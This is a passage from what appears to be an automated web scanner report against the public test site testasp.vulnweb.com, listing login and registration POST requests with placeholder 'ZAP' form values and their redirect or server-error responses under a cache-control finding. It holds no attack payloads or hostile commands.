Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=36 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=36">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=37 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:10 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=37">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=38 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=38">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=39 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=39">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=4 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:02 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=4">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 461 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 219 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=40 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:12 GMT Content-Length: 142 |
| Response Body - size: 142 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=40">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=5 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:02 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=5">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=6 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:02 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=6">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=7 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:02 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=7">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=8 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=8">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 459 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D9 Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 218 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /showthread.asp?id=9 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 141 |
| Response Body - size: 141 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/showthread.asp?id=9">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 499 bytes. |
POST http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml Content-Length: 23 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 23 bytes. |
tfUName=ZAP&tfUPass=ZAP
|
| Response Header - size: 234 bytes. |
HTTP/1.1 302 Object moved
Cache-Control: private Content-Type: text/html Location: /Templatize.asp?item=html/about.html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 157 |
| Response Body - size: 157 bytes. |
<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/Templatize.asp?item=html/about.html">here</a>.</body> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 447 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FDefault%2Easp%3F Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:24 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 445 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3F Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 473 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 463 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 463 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:42 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 463 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
